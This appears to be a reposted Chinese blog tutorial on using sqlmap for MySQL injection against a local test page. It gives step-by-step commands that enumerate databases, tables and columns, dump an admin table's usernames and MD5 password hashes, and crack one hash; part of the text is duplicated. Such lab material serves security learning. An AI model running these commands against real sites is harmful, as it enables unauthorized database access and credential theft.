sqlmap之(四)----Mysql注入实战
2017-02-27 16:25
555 查看
(1) 查找数据库
数据库有8个。
(2) 通过第一步的数据库查找表(假如数据库名为test)
猜解出来里面存在admin,sqltest两个表。
(3) 通过2中的表得出列名(假如表为admin)
(4) 获取字段的值(假如扫描出id,user,pwd字段)
sqlmap.py -u "http://localhost/sqls/index.php?id=123" -D test -T admin -C "id,user,pwd" --dump
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
你想存储的哈希值来与其他工具最终进一步处理临时文件? 输入"Y"
do you want to crack them via a dictionary-based attack? [Y/n/q]
你想通过基于字典的攻击来破解他们吗? 输入"N"
马上就得到了用户名
与MD5的密码: 3f230640b78d7e71ac5514e57935eb69 去破解下得到"qazxsw"
sqlmap.py -u "http://localhost/sqls/index.php?id=123" --dbs
数据库有8个。
(2) 通过第一步的数据库查找表(假如数据库名为test)
sqlmap.py -u "http://localhost/sqls/index.php?id=123" -D test --tables
猜解出来里面存在admin,sqltest两个表。
(3) 通过2中的表得出列名(假如表为admin)
sqlmap.py -u "http://localhost/sqls/index.php?id=123" -D test -T admin --columns
(4) 获取字段的值(假如扫描出id,user,pwd字段)
sqlmap.py -u "http://localhost/sqls/index.php?id=123" -D test -T admin -C "id,user,pwd" --dump
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
你想存储的哈希值来与其他工具最终进一步处理临时文件? 输入"Y"
do you want to crack them via a dictionary-based attack? [Y/n/q]
你想通过基于字典的攻击来破解他们吗? 输入"N"
马上就得到了用户名
与MD5的密码: 3f230640b78d7e71ac5514e57935eb69 去破解下得到"qazxsw"
相关文章推荐
- DVWA+SQLmap+Mysql注入实战
- sqlmap进行mysql注入root权限读写文件
- Web攻防系列教程之 PHP + Mysql注入攻防实战
- MySql 手工注入实战
- Web攻防系列教程之 PHP + Mysql注入攻防实战
- sqlmap之(三)----Access注入实战
- SQLmap注入学习实战 —— 宽字节注入与sqlmap进阶玩法
- dver实例sqlmap进行mysql注入root权限读写文件
- sqlmap cookie注入实战
- sqlmap之(六)----POST登陆框注入实战
- Web攻防系列教程之 PHP + Mysql注入攻防实战(转载)
- SQLmap注入学习实战 —— dvwa 从low到impossble
- php―mysql 5.0以上手工注入实战
- 2.羽翼sqlmap学习笔记之MySQL注入
- 【实战分享】sqlmap显示有注入却无法爆出库名
- sqlmap之(五)----Cookie注入实战
- mysql注入时的注释处理
- [转载]php+Mysql注入详解
- MySQL注入中导出字段内容的研究通过注入导出WebShell
- MYSQL 注入精华